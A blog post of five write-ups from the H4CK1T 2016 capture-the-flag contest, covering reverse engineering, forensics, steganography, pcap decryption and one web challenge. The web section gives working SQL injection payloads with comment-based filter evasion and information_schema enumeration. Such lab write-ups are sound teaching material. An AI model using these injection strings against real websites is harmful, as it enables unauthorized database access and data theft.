[H4CK1T 2016] Crypt00perator – Ethiopia Writeup

Standard

Description:

Long time ago one security module has been written. But for now its sources have been missed somehow. We have forgotten th3 access k3y, which, as we remember, has been hardcoded inside the module. Help us to recollect th3 k3y!11
crypt0_0perator_56e0a9f07f54b3634ab5cc2b30e5b29e.exe

h4ck1t{…}

This is a pretty basic reverse challenge. We can solve it in many different ways but I will show you only two of them. The first one is the quickest method that will work only for this challenge, and the second is for those of you who want to understand better how to solve such challenges in the future.

So, we got an exe file and we need to find the access key. We are given with a hint that the key is somehow hardcoded in the file itself. Let’s run the file and see what will happen.

Megabeets D:\Downloads\h4ckit\ethiopia
> crypt0_0perator_56e0a9f07f54b3634ab5cc2b30e5b29e.exe
Enter th3 k3y :
> Megabeets

Denied

Seems like all it does is to ask for the key, let’s take a deeper look and see if we the key is stored clear-text in the file. Open the file in IDA pro and press Shift+F12 to open the Strings subview. The strings that written by the programmer will usually be stored in close adresses. Her’e are snip of the strings. I marked the most meaningful:

.text:0000000000468093  00000005 C G u$E                                           
.data:0000000000472020  00000029 C o3dl6s|41a42344d110746d574e35c2f77ab6>3z        
.rdata:0000000000488000 00000008 C Allowed                                         
.rdata:000000000048800E 00000007 C Denied                                          
.rdata:0000000000488015 00000010 C Enter th3 k3y :                                 
.rdata:0000000000488070 00000011 C basic_ios::clear                                
.rdata:0000000000488090 00000025 C ios_base::_M_grow_words is not valid            
.rdata:00000000004880B8 0000002A C ios_base::_M_grow_words allocation failed       
.rdata:00000000004880F2 00000006 C POSIX                                           
.rdata:0000000000488100 00000012 C std::future_error                               
.rdata:0000000000488120 00000024 C __gnu_cxx::__concurrence_lock_error             
.rdata:0000000000488148 00000026 C __gnu_cxx::__concurrence_unlock_error                                          
...
...

We can easily notice the strings which we already faced when executing the program: ‘Denied’ and ‘Enter th3 k3y :’. The ‘Allowed’ string will probably be printed after entering the right key. But what is this strange string: ‘o3dl6s|41a42344d110746d574e35c2f77ab6>3z’? Is it the key? Let’s try.

Megabeets D:\Downloads\h4ckit\ethiopia
> crypt0_0perator_56e0a9f07f54b3634ab5cc2b30e5b29e.exe
Enter th3 k3y :
> o3dl6s|41a42344d110746d574e35c2f77ab6>3z

Denied

No luck. It is not the key, but what is it? It should be meaningful somehow but I don’t yet know how the program is using this string. I decided to debug the program and set a breakpoint before the decision whether the input is the right key or not is made.

Let’s go to the main function and set a breakpoint before the calling to the Checker method:

h4ck1t_ethiopia1

 

Now let’s run the program with that long string as the input and look at the registers. We can see that RAX is pushed to the Checker function. The checker function is comparing RAX with the long string and if RAX==long_string we get the Allowed message. But our RAX is different then the long string although we use the long string as our input what means that the inputted string is being manipulated and then compared to the original long string. So, what is our RAX? Let’s hover RAX with the cursor.

h4ck1t_ethiopia2

 

Well, RAX is looking like the flag. We will get the Denied message but at least we now have the flag.

Megabeets D:\Downloads\h4ckit\ethiopia
> crypt0_0perator_56e0a9f07f54b3634ab5cc2b30e5b29e.exe
Enter th3 k3y :
> h4ck1t{36f35433c667031c203b42d5a00fe194}

Allowed

 

So we solved the challenge but now let’s see what is happening behind the scenes of this program. We can find out what the program is doing without getting too deep into the assembly code. We already know that the program is taking our input and perform some manipulation on it. After that it compares the manipulated string to this long string ‘o3dl6s|41a42344d110746d574e35c2f77ab6>3z’. The best approach in this cases is to see what is the result of different inputs, I’ll show few examples that can teach us about the program:

 

[table id=1 /]

 

As you can see, this is probably a Substitution cipher implementation. Every character is replaced  always with the same another character. We can write a short python script to figure out what is the key using our a-z0-9{} input and the matching RAX string:

 

input = "abcdefghijklmnopqrstuvwxyz0123456789{}"     
rax = "fedcba`onmlkjihwvutsrqp_~}76543210?>|z"        
expected = "o3dl6s|41a42344d110746d574e35c2f77ab6>3z"                                       
flag= ''   

for c in expected:                                    
	flag += input[rax.index(c)]                       

print flag
# flag: h4ck1t{36f35433c667031c203b42d5a00fe194}

We got the flag 🙂

If you have any questions feel free to ask and I’ll explain more.

Flag: h4ck1t{36f35433c667031c203b42d5a00fe194}

 

[H4CK1T 2016] QRb00k – Russia Writeup

Standard

Description:

Task: QRb00k – Russia – W3b – 400
The secured messenger was developed in Canada, it’s using systems with qr keys for communicating, it allows to read other people’s messages only to this key holders. But is it true? And you have to figure it out …
http://hack-quest.com

This was a very good web challenge. It took me quite a time to fully understand it but was absolutely worth of its 400 points.

Starting the challenge we are given with a messenger site that uses QR codes to communicate. The site has two main pages:

  • Create – which creates QR code from a given name and message
  • Read – an upload form to upload QR code and read the message inside

So let’s create a message:

We got a QR code which is the key to read our message:

Now let’s read the message using the QR code:

 

Ok, it all worked as it supposed to. I used the zxing service to view the content of the QR code:

h4ck1t_russia_4

Look at the raw text. It’s a short string that looks like it was base64 encoded. But wait, base64 can’t begin with “==”! Those characters usually appear at the end of base64 encoded strings. Is it reversed? Let’s check:

>>> "==QehRXS"[::-1].decode('base64')
'Itay'

Yes! it indeed was reversed. our key (QR code) is created by: QR(Reverse(Base64(name))).

Ok, now that we understand the mechanics we can let the party begin and start playing with SQL Injection. In order to create the QR codes I used this site, It was faster than using the challenge site.

I began with the obvious: ‘ or 1=1–

h4ck1t_russia_5

Whoops, Busted. The system recognized my SQLi attack. I tried some filter bypassing methods and succeeded with this input:

'/*..*/union/*..*/select/*..*/database()/*..*/union/*..*/select/*..*/'Megabeets

Reverse(Base64(input)) == “==wc0VWZiF2Zl10JvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8SKoU2chJWY0FGZvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8yJ”

h4ck1t_russia_6

It worked! now let’s find the correct table (“messages”) and column by using some queries to map the database:

QR(Reverse(Base64(input))) == “zRXZlJWYnVWTn8iKu4iKvQ3YlxWZz9iKu4iKv42bp5WdvoiLuoyLnMXZnF2czVWbn8iKu4iKvU2apx2Lq4iLq8SZtFmbfVGbiFGdvoiLuoyLlJXZod3Lq4iLq8ycu1Wds92YuEWblh2Yz9lbvlGdh1mcvZmbp9iKu4iKv02byZ2Lq4iLq8SKl1WYu9lbtVHbvNGK0F2Yu92YfBXdvJ3ZvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8yJ”

'/*..*/union/*..*/select/*..*/group_concat(column_name)/*..*/from/*..*/information_schema.columns/*..*/where/*..*/table_name/*..*/like/*..*/'messages'/*..*/union/*..*/select/*..*/'Megabeets

h4ck1t_russia_7

“secret_field”? Sounds suspicious. Let’s query it and see what it contains:

'/*..*/union/*..*/select/*..*/secret_field/*..*/from/*..*/messages/*..*/union/*..*/select/*..*/'Megabeets

h4ck1t_russia_8

And we got the flag! I honestly really enjoyed this challenge.

Flag: h4ck1t{I_h@ck3d_qR_m3Ss@g3r}

 

If you have any questions feel free to ask 🙂

[H4CK1T 2016] ch17ch47 – Germany Writeup

Standard

Description:

ch17ch47 – Germany – 200 – Forensics
Find out who is the recipient of the information from the agent.
http://ctf.com.ua/data/attachments/CorpUser.zip

This challenge was second in this CTF which took me no more then five simple and basic commands in order to get the flag.

I roughly follow the same simple system whenever I face a new challenge. This system has prove itself again and again in almost any kind of challenge in different levels.

  1. Examine the file types that are given to you: An image, pcap, pe, etc. You can do it using the file command or just by open it
  2. Run ‘strings’ command on it.
    strings file_name | grep - i flag{convention}
  3. Run foremost (and binwalk) on the file
  4. Run strings on all the extracted files
This time we are given with a zip file. First, we want to unzip it in order to examine the files inside. It has a lot of file so I don’t paste here the full output.
Megabeets:/tmp/h4ckit/germany# unzip CorpUser.zip
Archive:  CorpUser.zip
   creating: CorpUser/
   creating: CorpUser/AppData/
   creating: CorpUser/AppData/Local/
   creating: CorpUser/AppData/Local/Apps/
   creating: CorpUser/AppData/Local/Apps/2.0/
   creating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/
   creating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/
   creating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/clic...exe_baa8013a79450f71_0001.0003_none_8554920337a51673/
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/clic...exe_baa8013a79450f71_0001.0003_none_8554920337a51673/GoogleUpdateSetup.exe
   creating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/GoogleUpdateSetup.exe
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/clickonce_bootstrap.exe
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/clickonce_bootstrap.exe.cdf-ms
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/clickonce_bootstrap.exe.manifest
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/clickonce_bootstrap_unsigned.cdf-ms
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/google.app_baa8013a79450f71_0001.0003_75c9b16f02ab5371/clickonce_bootstrap_unsigned.manifest
   creating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/manifests/
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/manifests/clic...exe_baa8013a79450f71_0001.0003_none_8554920337a51673.cdf-ms
  inflating: CorpUser/AppData/Local/Apps/2.0/2VQLGYNY.ZHM/X90XE08W.MG4/manifests/clic...exe_baa8013a79450f71_0001.0003_none_8554920337a51673.manifest
  ...
  ...
  DELETED LOT OF ROWS
  ...
  ...

 

We have a lot of files of different types from what seems like Windows machine (AppData, Favorites, Downloads, Desktop…). We can start step 2 that I mentioned before and recursively search for the flag in the strings of the files.

Megabeets:/tmp/h4ckit/germany# grep -R 'h4ck' CorpUser
Binary file CorpUser/AppData/Roaming/Skype/live#3aames.aldrich/main.db matches

This command iterates recursively all the files in the directory and the sub-directories and grep for the string ‘h4ck’. The command returned that there is a database file that is containing part of the flag. Now let’s strings command on the file:

Megabeets:/tmp/h4ckit/germany# strings CorpUser/AppData/Roaming/Skype/live#3aames.aldrich/main.db | grep h4ck1t
live:black.zogzog blackabauh4ck1t{87e2bc9573392d5f4458393375328cf2}h4ck1t{87e2bc9573392d5f4458393375328cf2}8183ce2902ef71ac62ab02a7c8ec762e6b14e318h4ck1t{87e2bc9573392d5f4458393375328cf2}h4ck1t{87e2bc9573392d5f4458393375328cf2}h4ck1t{87e2bc9573392d5f4458393375328cf2}h4ck1t{87e2bc9573392d5f4458393375328cf2}

And we got the flag. Easy, right?

Flag: h4ck1t{87e2bc9573392d5f4458393375328cf2}

[H4CK1T 2016] 1magePr1son- Mozambique Writeup

Standard

Description:

Task: 1magePr1son- Nozambique- Stego- 150

Implementing of the latest encryption system as always brought a set of problems for one of the known FSI services: they have lost the module which is responsible for decoding information. And some information has been already ciphered! Your task for today: to define a cryptoalgorithm and decode the message.
https://ctf.com.ua/data/attachments/planet_982680d78ab9718f5a335ec05ebc4ea2.png.zip
h4ck1t{str(flag).upper()}
https://ctf.com.ua/data/attachments/planet_982680d78ab9718f5a335ec05ebc4ea2.png.zip

For the start we are given with a wallpaper image named planet.png (2560×1850)

h4ck1t_mozambiqu1

Looking carefully at the image we can see a pattern of strange dots, such dots may be connected to the cryptosystem. Those are pixels in different colors that probably belongs to another image. My thought is that the pixels of the flag image was splitted into the wallpaper.

h4ck1t_mozambiqu2

The dots exists every 24 pixels so I wrote a short pythons script in order to combine them into one image:

from PIL import Image

original = Image.open("planet.png")
p_orig = original.load()
width, height = original.size
new_image = Image.new('RGBA',(width,height)) # The original image dimensions
p_flag = new_image.load()
cord_x, cord_y = 0, 0

# Collect the pixels and add them to the new image 
for j in range(0,height,24):
    for i in range(0,width,24):
        p_flag[cord_x,cord_y] = p_orig[i,j]
        cord_x+=1
    cord_y+=1
    cord_x=0
	
new_image.save('flag.png', 'PNG')

I ran it and got a big image (the wallpaper size) with this tiny image inside that contains the flag:

h4ck1t_mozambiqu3

Flag: h4ck1t{SPACE_IS_THE_KEY}

[H4CK1T 2016] v01c3_0f_7h3_fu7ur3 – Australia Writeup

Standard

Description:

v01c3_0f_7h3_fu7ur3 – Australia – 300 – Network
The captured data contains encrypted information. Decrypt it.
http://ctf.com.ua/data/attachments/wireshark_8764d640d217fd346e2db2b5c38dde13.pcap

The first thing I do when I face a pcap challenge is, of course, open it in Wireshark. If it looks normal (and not, for example, Bluetooth traffic) I then run ‘foremost‘ on the file. ‘foremost‘ is searching for a known files in a given file by file headers, footers etc, and then extract it to ‘output’ folder in the directory.
So foremost found several files in the PCAP from several sources like http and ftp traffic

  • png
  • gif
  • jpg
  • rar
  • (…)

I opened the rar archive and found a file named ‘key.enc’ which contained “Salted_<GIBBERISH>” . I opened it in hex editor:

h4ck1t_australia_1

At the first, as the name says, I thought I found the key of some encryption and now I need to find the encrypted file and the cipher. But in a second thought I said to myself that ‘*.enc’ is usually for the encrypted files! So that file isn’t a key, it’s encrypted and we need to decrypt it. But what is the key and the cipher?

So, I figured out that file that starting with “Salted_” is file that was encrypted using ‘openssl’ application.
I then went to read the task again, I saw that the name of the challenge is “v01c3_0f_7h3_fu7ur3” so I thought maybe it involves some audio. Searched for ‘mp3’ or ‘aud’ in the pcap (queries: ‘tcp contains mp3’ , ‘tcp contains aud’) and found the following url:
http://priyom.org/scripts/audioplayer.min.js

It’s an innocent javascript file. I entered the “priyom” site and read it’s description:

“Priyom is an international organization intending to research and bring to light the mysterious reality of intelligence, military and diplomatic communication via shortwave radio: number stations”

Sounds interesting. So I looked up again in the pcap and saw a request to this specific url:
http://priyom.org/number-stations/english/e06

There is a robotic voice that reads out numbers.
75975975948648631317369873698599905999017212172126397363973486486313100000

So I now have what seems like a key, so what is the encryption?
A bit research about the encryption made me think it’s AES so I ran:

openssl aes-256-cbc -d -in key.enc -k <the long key>

-d is for decrypt
-k is for keyphrase

Failed. So I read about the structure of the voice record in the website and took only the Message part from the numbers: 7369859990172126397300000
this is the actual Message part (5-digit paired groups) and 5 zeroes at the end. without the Intro, Outro, Premable, Postmable and the Duplicate 5-digits.

Failed again. Tried it with all the possible openssl  encryptions (20+) but failed again.
So I got mad and tried to decrypt it using all possible encryptions with all possible substrings of the original number from the record.
Pseudo code:

for sb in all_possible_substrings(key)
{
	for enc in all_possible_encryptions:
	(
		openssl encr -d -in key.enc -k sb
	)
}

And how it was really looks like:

h4ck1t_australia_2
it took 30 minutes to run.
BUT FAILED. No flag.

At this point I think that 3 or 4 teams already solved it.
So I tried more and more combinations and this stupid one finally worked:

Megabeets:/tmp/h4ckit/australia# openssl aes-256-cbc -d -in key.enc -k 75948631736985999017212639734863100000
h4ck1t{Nic3_7ry}

It’s the full number from the recording but delete the duplicates pairs (the recording was splitted to group of numbers and the speaker said each group twice or three times).

So the hardest part was actually to figure out the exact keyphrase, the rest was pretty easy.

Flag: h4ck1t{Nic3_7ry}